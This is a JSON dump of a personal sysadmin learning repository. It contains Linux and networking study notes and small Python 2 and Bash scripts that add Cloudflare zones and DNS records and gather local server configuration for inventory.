bandwidth\n- Switch - connects multiple devices rogether providing host with dedicated bandwith (work on layer 2)\n- Bridge - similar to a switch but has less ports and is software based\n- Router - connect two or more logical subnets providing path selection and packet switching ( work on layer 3,2,1)\n\n"
},
{
"alpha_fraction": 0.48571428656578064,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 10.333333015441895,
"blob_id": "55c939e034e6a577d2f30395ab0a9b9d9a806c3d",
"content_id": "7810ac30de6ec136c8a6aa7afefa318feee7efab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/scripting/test.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "print 5\nprint 'x = 5'\nprint \"x+1\"\n\n"
},
{
"alpha_fraction": 0.6621004343032837,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 42.79999923706055,
"blob_id": "478c73d3db2ba380119dc79f8a186f9750ebb11b",
"content_id": "e0269262db9ddcfd7f56208bc3b7f2d9f4fda01b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 10,
"path": "/add_domains.sh",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#add domains in CF via txt file which is using domain_list.txt \n#fill email and key from your account in variables below\nCF_API_EMAIL=\"\"\nCF_API_KEY=\"\"\nfor domain in $(cat domain_list.txt); do \\\n curl -s -X POST -H \"X-Auth-Key: $CF_API_KEY\" -H \"X-Auth-Email: $CF_API_EMAIL\" \\\n -H \"Content-Type: application/json\" \\\n \"https://api.cloudflare.com/client/v4/zones\" \\\n --data '{\"name\":\"'$domain'\",\"jump_start\":true}' | jq; done\n"
},
{
"alpha_fraction": 0.6161859035491943,
"alphanum_fraction": 0.6177884340286255,
"avg_line_length": 48.91999816894531,
"blob_id": "1be4c412a3e0a7056461758defbb2044030df714",
"content_id": "c6dab8fd8de20fc249222c98f2e8f0ff01c68d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1248,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 25,
"path": "/add_dns_records.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# this script is using to add dns records in CF ( CloudFlare account) using file domains-with-id.txt\n#IP_address - add IP adres to point\n#X-Auth-Email: add email which you are using to autenticate in CF (this info you can take from you CF account)\n# X-Auth-Key: add authentification key (this info you can take from you CF account)\nimport subprocess\n\n\ndef main(): \n\tf = open(\"domains-with-id.txt\", \"r\")\n\tfor l in f:\n\t\tif not l.strip():\n\t\t\tcontinue\n\n\t\tdomain, ident = [i.strip() for i in l.split(\" \")]\n\t\tp = [\"curl\", \"-s\", \"-X\", \"POST\", \"https://api.cloudflare.com/client/v4/zones/%s/dns_records\" % ident, \"-H\", \"X-Auth-Email: c\" , \"-H\", \"X-Auth-Key: \" , \"-H\", \"Content-Type: application/json\" , \"--data\" , '{\"type\":\"A\",\"name\":\"%s\",\"content\":\"IP_address\",\"proxied\":true}' % domain]\n\t\tprint \"Executing: %s\" % \" \".join(p)\n\t\tsubprocess.Popen(p).wait()\n\t\tp = [\"curl\", \"-s\", \"-X\", \"POST\", \"https://api.cloudflare.com/client/v4/zones/%s/dns_records\" % ident, \"-H\", \"X-Auth-Email: \", \"-H\", \"X-Auth-Key: \", \"-H\" , \"Content-Type: application/json\", \"--data\" , '{\"type\":\"CNAME\",\"name\":\"www\",\"content\":\"%s\",\"proxied\":true}' % domain]\n\t\tprint \"Executing: %s\" % \" \".join(p)\n\t\tsubprocess.Popen(p).wait()\n\n\nif __name__ == '__main__':\n\tmain()\n"
},
{
"alpha_fraction": 0.6677631735801697,
"alphanum_fraction": 0.6973684430122375,
"avg_line_length": 32.88888931274414,
"blob_id": "619459332f69e0acfd81572340b662ed8a8960ae",
"content_id": "56efbba32488ea1143fe7eb1c2bc9a7d6fff7b3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 9,
"path": "/scripting/learning_python/python_research_notes.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# Charters\n\n[x] Script hello.py (from Automate Boring stuff with python) working correct with python 3 insted of python 2.7\n\n**explore:** function input() doesnt work with python 2.7\n\n**to:** change script to work with python 2.7\n\n**solution:** in python 2.7 use ```raw_input()``` insted of ```input()```"
},
{
"alpha_fraction": 0.5097001791000366,
"alphanum_fraction": 0.5139833688735962,
"avg_line_length": 28.399999618530273,
"blob_id": "57ff3b966dc20e6ecc1b398618adcd889f486c3e",
"content_id": "3dd754ca05d34337f10e0a3a7b65e4deabaa39d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3969,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 135,
"path": "/scripting/system_info_srv.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#this script will collect information from our servers\n#-*- coding: utf-8 -*\n \n \nimport os\nimport sys\nfrom argparse import ArgumentParser\nimport glob\nimport subprocess\n \n \nPROFILES = {\n \"basic\": {\n \"files\": [\n '/etc/resolv.conf',\n '/etc/redhat-release',\n '/etc/postfix/*.cf',\n '/usr/sbin/*.sh',\n '/var/lib/jenkins/jobs/*/config.xml',\n '/etc/httpd/conf.d/*',\n '/etc/my.cnf',\n '/etc/bacula/bat.conf',\n '/etc/exports'\n ],\n\n \"commands\": [\n ['ifconfig' ,'-a'],\n ['crontab', '-l'],\n ['uname', '-a'],\n ['iptables','-L']\n ['docker','ps','-all'],\n ['docker', 'images'],\n ['df','-hT'],\n ['fdisk', '-l'],\n ['lscpu']\n ]\n }\n\n\n }\n\n \"centos\":{\n \"files\":[\n '/etc/mysql/*.conf',\n ],\n\n \"commands\":[\n ['chkconfig']\n ['sestatus','v']\n ['getsebool''a']\n ]\n \n }\n\ndef get_info_from_files(output_file_handler, files_to_look_for):\n delim = \"=\" * 40 + \"\\n\"\n delim2 = \"-\" * 40 + \"\\n\"\n for f in files_to_look_for:\n print \"Info: Working on: %s\" % f\n # Write the expected file name in the output file\n output_file_handler.write(\"Working on file: %s\\n\" % f)\n output_file_handler.write(delim)\n output_file_handler.write(\"\\n\"*5)\n \n gf = glob.glob(f)\n if(not gf):\n print >> sys.stderr, \"Warining: No files for %s\" % f\n for g in gf:\n print \"Info: Working on file after glob: %s\" % g\n output_file_handler.write(\"Working on after glob: %s\\n\" % g)\n output_file_handler.write(delim2)\n output_file_handler.write(\"\\n\"*5)\n try:\n o = open(g, 'r').read()\n output_file_handler.write(o)\n except IOError, err:\n print >> sys.stderr, \"Warning: File %s could not be read: %s\" % (g, str(err).strip())\n output_file_handler.write(\"\\n\"*5)\n \n \ndef get_info_from_commands(output_file_handler, commands):\n delim = \"=\" * 40 + \"\\n\"\n for c in commands:\n print \"Info: Executing Command: %s\" % \" \".join(c)\n # Write the expected file name in the output file\n output_file_handler.write(\"Command: %s\\n\" % \" \".join(c))\n output_file_handler.write(delim)\n output_file_handler.write(\"\\n\"*5)\n \n p = subprocess.Popen(c, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n so, se = p.communicate()\n rc = p.returncode\n if(rc != 0):\n print >> sys.stderr, \"Warning: Command %s failed with %i:\\n Error message: %s\" % (\" \".join(c), rc, se.strip())\n else:\n output_file_handler.write(so)\n \n output_file_handler.write(\"\\n\"*5)\n \n \ndef get_args(profiles):\n parser = ArgumentParser(description=\"This is useful script and shows how to use option parser\")\n \n parser.add_argument(\"-o\", \"--output-file\",\n help=\"File to write the data in\")\n parser.add_argument(\"-p\", \"--profile\",\n choices=[i for i in profiles],\n default=[i for i in profiles][0],\n help=\"Choose from a predefined set of commands and files for particular purpose\")\n \n args = parser.parse_args()\n \n if(not args.output_file):\n print >> sys.stderr, \"Error: You have to supply --output-file\"\n sys.exit(1)\n \n return args\n \n \ndef main():\n args = get_args(PROFILES)\n \n output_file = os.path.abspath(args.output_file)\n profile_name = args.profile\n \n print \"Running Profile: %s\" % profile_name\n \n with open(output_file, 'w') as o_f:\n get_info_from_files(o_f, PROFILES[profile_name][\"files\"])\n get_info_from_commands(o_f, PROFILES[profile_name][\"commands\"])\n \n \nif(__name__ == \"__main__\"):\n main()\n"
},
{
"alpha_fraction": 0.7363184094429016,
"alphanum_fraction": 0.746268630027771,
"avg_line_length": 38.79999923706055,
"blob_id": "591a242edd8fd2139d3a7b9e37cd3cb23e931cd5",
"content_id": "64965d087757b74bf344670cdd2cceff507283b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 5,
"path": "/python27_official_docs_notes.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "Python 2.7 official documentation notes\n======\n* python is:\n\t* dynamically typed -> doesn't use explicit datatype declarations\n\t* stringly typed -> once a variable has a datatype it actually matters\n\t\n"
},
{
"alpha_fraction": 0.6460674405097961,
"alphanum_fraction": 0.6460674405097961,
"avg_line_length": 22.733333587646484,
"blob_id": "f7c5f2d1411452f7514466fb2de519257f209505",
"content_id": "9131613c2e3072067641c4a87504ecfc02841a46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 15,
"path": "/parse_moved.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#this file tmp-cf.txt content information in json format from CloudFlare account\n#parse information from txt file and print domain with status\n\nimport json\n\n\ndef main():\n\tmoved = json.load(open(\"tmp-cf.txt\", \"r\"))\n\tfor i in moved[\"result\"]:\n\t\tprint \"%s %s %s\" % (i[\"name\"], i[\"id\"], i[\"status\"])\n\n\nif __name__ == '__main__':\n\tmain()\n"
},
{
"alpha_fraction": 0.6738070249557495,
"alphanum_fraction": 0.6873806715011597,
"avg_line_length": 31.73611068725586,
"blob_id": "ea184b5df22e44ce299230614380f82bebeb9fd6",
"content_id": "2aa433bd3b67e89e1892e286aed6f997acb02e00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4715,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 144,
"path": "/linux.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "\n# Phases of the boot process\nBootstrapping means \"starting up a computer\". During bootstrapping the kernel is loaded into memory and begining to execute.\n- reading of the bootloades from the MBR(master boot record)\n- loading & initialization of the kernel\n- device detection & configuration\n- creation of kernel process\n- administrator intervention (single-user mode onluy)\n- execution of the system startup scripts\n\nThe kernel is itself a program and the first bootstrappping task is to get this program into memory so that it can be executed.\n/unix or /vmunix <-> /boot/vmlinuz\n\n## Schema of bootstraping\n BIOS -> MBR -> GRUB -> Kernel -> Init Process -> Runlevels\n \n# Reboots&Runlevels\n telinit X - change init level;X is number of runlevel \n init X - change init level;X is number of runlevel\n whoami - check user \n runlevel - check runlevel\n shutdown -r now - reboot the computer\n\n## Runlevels\n- 0 Halt\n- 1 Singe-user mode\n- 2 Multi-user with partial services\n- 3 Full multi-user with networking (text mode)\n- 4 Not used\n- 5 Full multi-user graphical mode (provides a GUI desktop login)\n- 6 Reboot\n\n##Some kernel processes on Linux systems\n- kjournald - commits filesystem journal updates to disk\n- kwsapd - swaps processes wen physical memory is low\n- ksoftirqd - handles soft interrupt if they can't be dealt with context swich time\n- khubd - configures USB devices\n\n- fstab or vfstab - files determine how the filesystem should be mount\n- fsck - this command check & repair filesystem\n\n\n# renicing and killing rouge processes ->nice level\n* -20 highest priority\n* 0 normal, default\n* 19 lowest priority\n\n# Prmissions\n```chmod```<br />\n```d _ _ _ _ _ _ _ _ _ filename ```<br />\n```user group other```<br />\nr = 4 w = 2 x = 1 <br />\n```chmod u+x file``` <br />\n```chmod ugo -w file``` <br />\n```chmod 555 file``` <br />\n\n## SetUID, SetGID, and Sticky Bits\nSUID = 4 SGID = 2 sticky bit = 1 <br />\nSUID - rws rwx rwx ```chmod u+s file```<br />\nSGID - rwx rws rwx ```chmod g+s file```<br />\nstickybit -rwx rwx rwt ```chmod o+t file```<br />\n\n\n* *SUID*<br />\nfile - allows executable binnary to run with permission of owner<br />\nfolder - no effect<br />\n* *SGUID*<br />\nfile - same as SUID but with group permission<br />\nfolder - new files in folder make on matching group ownership<br />\n* *sticky bit*<br />\nfile - no effect<br />\nfolder - fildes within can only be deleted or renamed by owner or root<br />\n\n# command **STDIN STDOUT STDERR**\nSTDIN - comes from keyboard<br />\nSTDOUT - goes to console<br />\nSTDERR - cose to console<br />\n\n* Not all commands listen for STDIN\n\n* 0< redirect STDIN <br />\n* 1> redirect STDOUT <br />\n* 2> redirect STDERR <br />\n* '|' pipe resolts into STDIN of a command <br />\n* '>>' this will append instead of everwriting <br />\n* & used if redirecting STDERR into STDOUT or vice versa <br />\n\n# Cron & Time services <br />\nCRON - command run on (/etc)\n* runns in 3 ways:<br />\n\t1. cron.hourly, cron.daily , cron.monthly, cron.weekly <- root<br />\n\t2. /etc/crontab <- specify user which run this cron<br />\n\t\t/etc.cron.d/*<br />\n\t3. 
personal crontab <- user<br />\n```crontab -e``` -> edit crontab<br />\n```crontab -l``` -> check cron on current user<br />\n\n## Example of job definition:<br />\n```\n#.---------------- minute (0 - 59)\n#| .------------- hour (0 - 23)\n#| | .---------- day of month (1 - 31)\n#| | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n#| | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n#| | | | |\n#* * * * * user-name command to be executed\n```\n\n\n* **can be**<br />\n*/5 every 5<br />\n2,3,6 only 2,3,6<br />\n3-10 from 3 to 10<br />\n\n# SELinux\n* Good - standart posix permissions\n* Better - ACLs\n* Best - SELinux\nSELinux:\n- stops foot - shoooting\n- limits application's ability\n- manage by port, app\nPRO TIP\nIf you've configured thing correctly, but stuff doesn't work, look for SELinux issues\n/etc/syssconfig/selinux\nSELINUX modes:\n- enforcing -> enacts rules\n12/54- permissive -> logs violations, but doesnt stop them\n- disabled -> turned off\nContect lables:\n- default SELinux mode is \"targeted\"\n- files, folders, process, ports are labeled according the access required to access them\nshow contexts: ls -Z; ps -Z; netstat -Z\nchanging contexts\nchcon -t type file/folder\nrestorecon -vR /var/www\nNOTE - contexts are inherited like permissions and ACLs . So cp is often more effective than mv\n/etc/log/audit -> logs about selinux\nyum install setroubleshoot-server ->this packet help to see humanreadable format in selinux\nservice restart audit\nsealert -l\nSELinux booleans\ngetsebool -a -> show all possible (grep is useful here)\nsetsebool [-P] booloption on/off (1/0)\n/etc/selinux/targeted/modules/active/booleans.local\n"
}
] | 11 |
superservice-international/nightvision-camera | https://github.com/superservice-international/nightvision-camera | 2d077768887eaa84524a729c4c4b6a79daeb55df | a8116216845b2acb9ea3bbd730d221e3798773ba | 5f6558ef9d6d130202a14d5a87d1c1f9c9045e70 | refs/heads/master | 2020-05-28T07:13:33.944869 | 2017-10-27T09:53:15 | 2017-10-27T09:53:15 | 33,070,097 | 0 | 0 | null | 2015-03-29T11:08:59 | 2017-03-06T16:30:45 | 2017-10-27T09:53:16 | Python | [
{
"alpha_fraction": 0.5819520950317383,
"alphanum_fraction": 0.5870165824890137,
"avg_line_length": 25.814815521240234,
"blob_id": "a00b3366f6a119ac43426d5c402ec2a26859b002",
"content_id": "cdb11b7eaef6d35224b5f44edc5df6561c18159c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2172,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 81,
"path": "/take_picture.py",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "import picamera\nimport time\nimport datetime\nimport os\nimport requests\nfrom PIL import Image\n\n\ndef take_picture():\n now = datetime.datetime.now()\n now_str = now.strftime('%Y-%m-%d_%H-%M-%S')\n path = os.path.dirname(os.path.abspath(__file__))\n file_name = path + \"/\" + now_str + '.jpg'\n with picamera.PiCamera() as camera:\n camera.resolution = (1024, 768)\n time.sleep(2)\n camera.capture(file_name)\n print(file_name + \" taken\")\n return file_name\n\n\ndef reduce_filezise(file_name):\n im = Image.open(file_name)\n im.save(file_name, 'JPEG', quality=90)\n\n\nclass TokenAuth(requests.auth.AuthBase):\n def __call__(self, r):\n token = 'Token %s' % os.environ.get('API_TOKEN')\n r.headers['Authorization'] = token\n return r\n\n\ndef post_picture(file_name):\n host = os.environ.get('API_URL')\n\n query = \"?query=mutation{postPicture(input: {}){success errors clientMutationId}}\"\n\n print(\"now posting \" + file_name)\n post = requests.post(\n url=host + query,\n auth=TokenAuth(),\n files={'image': open(file_name, 'rb')}\n )\n result = post.json()['data'].get('postPicture')\n if result:\n return result.get('success', False)\n\n\ndef post_picture_slack(file_name):\n token = os.environ.get('SLACK_TOKEN')\n with open(file_name, 'rb') as pic:\n response = requests.post(\n url=\"https://slack.com/api/files.upload\",\n data={'token': token, 'channels': 'horsebot'},\n files={'file': pic}\n )\n return response.json().get('ok', False)\n\n\ndef delete_picture(file_name):\n print(\"now deleting \" + file_name)\n os.remove(file_name)\n\n\ndef post_remaining():\n path = os.path.dirname(os.path.abspath(__file__))\n for pic in os.listdir(path):\n if pic.split('.')[-1] == 'jpg':\n post = post_picture_slack('/'.join([path, pic]))\n if post:\n delete_picture('/'.join([path, pic]))\n\n\nif __name__ == \"__main__\":\n picture = take_picture()\n reduce_filezise(picture)\n posted = post_picture_slack(picture)\n if posted:\n delete_picture(picture)\n post_remaining()\n"
},
{
"alpha_fraction": 0.7366254925727844,
"alphanum_fraction": 0.748971164226532,
"avg_line_length": 19.25,
"blob_id": "86cda3f45b43e817de2f67cd2c769231cf36f337",
"content_id": "ec8b9f42a178e82c2cbb2b1af6537475470c8e37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 12,
"path": "/README.md",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "# nightvision-camera\n\non the raspberry pi, this software requires:\n\n`sudo apt-get install python-dev`\n\n`sudo apt-get install python3.4-dev`\n\n`sudo apt-get install libjpeg8-dev`\n\n## misc\n* [mausberry](https://mausberry-circuits.myshopify.com/)\n"
},
{
"alpha_fraction": 0.6709956526756287,
"alphanum_fraction": 0.6796537041664124,
"avg_line_length": 12.588234901428223,
"blob_id": "05017705fbe8469937b63feaeb6864a5350e9390",
"content_id": "afefcd4bfa012b759c6b900add6f01086f71f2e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 17,
"path": "/Makefile",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "PYTHON := env/bin/python\nPIP := env/bin/pip\n\n.PHONY: build watch\n\nall: install\n\n$(PYTHON):\n\tvirtualenv -p python3.4 env\n\n$(PIP): $(PYTHON)\n\ninstall: $(PIP)\n\t$(PIP) install -r requirements.txt\n\npost:\n\tenv/bin/python take_picture.py\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.7894737124443054,
"avg_line_length": 8.5,
"blob_id": "5c8ca2d64acdec9361278818fd82b8d7945ba4f1",
"content_id": "d09870a546013f3aa68d09390b28963bed6b73b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "superservice-international/nightvision-camera",
"src_encoding": "UTF-8",
"text": "picamera\nrequests==2.13.0\nPillow\nipdb\n"
}
] | 4 |
arrzdev/SimilarityAlgorithm | https://github.com/arrzdev/SimilarityAlgorithm | c5f6e87dae12c8649063e1ae7e1dcf1cbb490a1e | eafb9930fc150177bc59dd8dd1651296f8fa7eb8 | 57fe310198b193853b15b8f4625c23c125f1820e | refs/heads/main | 2023-03-30T01:52:40.245851 | 2021-04-09T13:01:13 | 2021-04-09T13:01:13 | 356,267,259 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5869886875152588,
"alphanum_fraction": 0.603745698928833,
"avg_line_length": 30.703125,
"blob_id": "d01ea03d126694298661f4d4032e09758f191d61",
"content_id": "d23eddcd50fff125dc8b60cfe80e2dfd76b3ed5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2029,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 64,
"path": "/algo.py",
"repo_name": "arrzdev/SimilarityAlgorithm",
"src_encoding": "UTF-8",
"text": "import unidecode\n\n'''\nAlgorithm made by ARRZ.DEV\nThanks <3\n'''\n\ndef similarity_algo(string1, string2): #returns a probability\n if not string1 or not string2:\n return 'missing parameter'\n\n def sort_funct(string): #function to sort each word by a 'unique' id\n id_ = 0\n\n for letter in string: #add to the id the ordinal of each letter in that string\n id_ += ord(letter)\n\n #this is to make it even more 'unique' --\n id_ += ord(string[0]) #add to the id the ordianal of the first letter in that string\n id_ += len(string) #add to the id the lenght of the string\n \n return id_\n\n #normalize both strings\n string1 = unidecode.unidecode(string1).lower().strip()\n string2 = unidecode.unidecode(string2).lower().strip()\n\n #create both 'words' dictionary's\n string1Words = sorted(string1.split(), key=sort_funct)\n string2Words = sorted(string2.split(), key=sort_funct)\n\n #calculate the max score and the score per letter\n max_score = (5*len(string1Words))\n score_per_letter = max_score/len(\"\".join(string1Words))\n\n #init score as 0\n score = 0\n\n for word_index in range(len(string1Words)):\n try:\n\n if string2Words[word_index] == string1Words[word_index]:\n score += len(string2Words[word_index])*score_per_letter\n\n else: #if the word isnt 100% equal divide in letters and test it!\n #loop trough letters\n\n for letter_index in range(len(string1Words[word_index])):\n #print(f'L: {string1Words[word_index][letter_index]}')\n\n if string2Words[word_index][letter_index] == string1Words[word_index][letter_index]:\n score += score_per_letter\n\n else:\n #add the penalty here for each letter\n pass\n\n except:\n pass\n\n #calculate the similarity %% (probability)\n probability = (score/max_score) * 100\n\n return probability\n"
},
{
"alpha_fraction": 0.760765552520752,
"alphanum_fraction": 0.7639553546905518,
"avg_line_length": 38.1875,
"blob_id": "499d43ef21c5ed234551393e0776e67befe1e3f2",
"content_id": "6d2fd646dfc88c517b1b3b838d53210d4271d508",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 627,
"license_type": "permissive",
"max_line_length": 244,
"num_lines": 16,
"path": "/README.md",
"repo_name": "arrzdev/SimilarityAlgorithm",
"src_encoding": "UTF-8",
"text": "# SimilarityAlgorithm\nA algorithm to find the similarity between to given strings.\n\n\n## About\nThis is the 3rd and last version of my algorithm\n\nI made this algorithm for my project \"KahootBot\". This algorithm proved to be the best among many (cosine, jaccard, levenshtein) to meet the needs I had, however this does not mean that in other circumstances my algorithm is in fact \"the best\".\n\n## Penalty\nIn the algo there is a else statement with a penalty comment... there you can add a penalty for each wrong letter (in case you need that)\n\nPenalty Example: ( score -= score_per_letter/2 )\n\n## Hope this can be usefull\narrz.dev\n"
}
] | 2 |
subhankarbehera/python | https://github.com/subhankarbehera/python | d2091fb9cf0bf4894dd058390e801678b70c7100 | 25c57abda91775fc60140e14a9a9621e4bd898c7 | 509b6e1de23756620b3949f2ee4b346b1c8cf27c | refs/heads/main | 2023-02-06T00:54:51.665210 | 2020-12-28T07:17:02 | 2020-12-28T07:17:02 | 321,564,385 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6338028311729431,
"alphanum_fraction": 0.6338028311729431,
"avg_line_length": 22,
"blob_id": "a468d1c065256faff2ecac073896d47c1f42ea37",
"content_id": "67438dba23431283d71c4a9ab1250995a996b61e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 3,
"path": "/loop 1.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "mylist = {\"one\",\"two\",\"three\"}\nfor number in mylist:\n\tprint(number);\n\t\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 8,
"blob_id": "60295ebc39ff2e5879cfa69fbb1f457148e5b418",
"content_id": "4177ce77dc6e423eb65e4787f4658d1a62eb0746",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 5,
"path": "/addition.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "x=19\ny=20.35\nprint(x);\nprint(y);\nprint(x+y);\n"
},
{
"alpha_fraction": 0.38181817531585693,
"alphanum_fraction": 0.4909090995788574,
"avg_line_length": 8.166666984558105,
"blob_id": "b7107041e82c594b45015629b2ccfc8b2fe01b8a",
"content_id": "38916ac27f373ef3b6650d026cb650b4b2521d73",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 6,
"path": "/new script.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "i=\"I got\"\nj=\"100\"\nprint(i+j);\na=\"5\"\nb=\"13\"\nprint(a**);\n"
},
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5609756112098694,
"avg_line_length": 9.25,
"blob_id": "70405c5f6622e5328441519eeb367d5a52d99e95",
"content_id": "a02fd5ea23070c5e606a7c4a9f67a5956dad2317",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41,
"license_type": "permissive",
"max_line_length": 10,
"num_lines": 4,
"path": "/variables.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "x=\"I AM A\"\ny=\"CODER\"\nprint(x);\nprint(y);\n"
},
{
"alpha_fraction": 0.53125,
"alphanum_fraction": 0.59375,
"avg_line_length": 19.33333396911621,
"blob_id": "049264f842c457acdea0fa7f4544b19b90306c3d",
"content_id": "da05538b08c05f6e976e4457014afe1b7b542058",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 3,
"path": "/hello.py",
"repo_name": "subhankarbehera/python",
"src_encoding": "UTF-8",
"text": "print(\"hello\");\nif 12>10:\n print(\"jay jawan jay kissan\");\n \n"
}
] | 5 |
Olivers11/Grabadora-Python | https://github.com/Olivers11/Grabadora-Python | 3539afe2cbc8de462e3a79e3c00ecb4fd6b0e94a | 8bb25e39aef57f762c55252ece12f6b2d7542e9d | d79225217d2467371ee9ff29945c107927e300d8 | refs/heads/master | 2022-11-21T09:19:55.205160 | 2020-07-15T16:55:46 | 2020-07-15T16:55:46 | 279,923,564 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6844614148139954,
"alphanum_fraction": 0.7075786590576172,
"avg_line_length": 29.194244384765625,
"blob_id": "dc71170d852a6d43993bb337e14e97daf50ae48c",
"content_id": "b8d0167d621161b9e6beb257094979eb890400f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4196,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 139,
"path": "/grabadora.py",
"repo_name": "Olivers11/Grabadora-Python",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport cv2\nimport ctypes\nimport glob\nimport numpy as np\nimport pyautogui\nimport threading\nimport os\n\n\n#Clase principal de la grabadora\n\n\nclass Grabadora:\n\n\tdef __init__(self, master):\n\t\t#|objeto para manejar ss|\n\t\tself.frame = master\n\t\tself.fourcc = cv2.VideoWriter_fourcc(*\"XVID\")\n\t\tself.hora = 0\n\t\tself.minutos = 0\n\t\tself.segundos = 0\n\t\tself.grabando = False #Esta variable nos dira si estamos grabando o no\n\t\tself.PintarInterfaz()\n\t\n\tdef LimpiarContadores(self):\n\t\t#Funcion que limpia todos los contadores |hora,minuto,segundos| al comenzar\n\t\tself.hora = 0\n\t\tself.minutos = 0\n\t\tself.segundos = 0\n\n\n\tdef FormatoHora(self, c):\n\t\t#Esta funcion nos da formato al medidor de tiempo\n\t\tif c < 10:\n\t\t\tc = \"0\"+ str(c)\n\t\treturn c\t\n\t\n\tdef ObtenerPantalla(self):\n\t\t#creamos una instancia del modulo ctypes \n\t\tpantalla = ctypes.windll.user32\n\t\tpantalla.SetProcessDPIAware()\n\t\t#Obtenemos las medidas de x(0) - y(1) por medio de nuestra instancia \n\t\ttamanio = pantalla.GetSystemMetrics(0), pantalla.GetSystemMetrics(1)\n\t\treturn tamanio\n\n\tdef Archivo(self, tex, ext):\n\t\tcount = 0\n\t\t#Este metodo verifica si existe un archivo con el mismo nombre\n\t\t#En el mismo directorio, si los hay, debemos colocar el mismo nombre\n\t\t#Pero colocarle el numero de archivo repetido que es: copia-copia2\n\t\tfor x in glob.glob('*'+ext):\n\t\t\tif tex in x:\n\t\t\t\tcount += 1\n\t\tif count > 0:\n\t\t\t#Si tenemos dos o mas concidencias de nombre agregamos el numero al nombre\n\t\t\tnombre = tex+\" \"+str(count)+ext\n\t\telse:\n\t\t\tnombre = 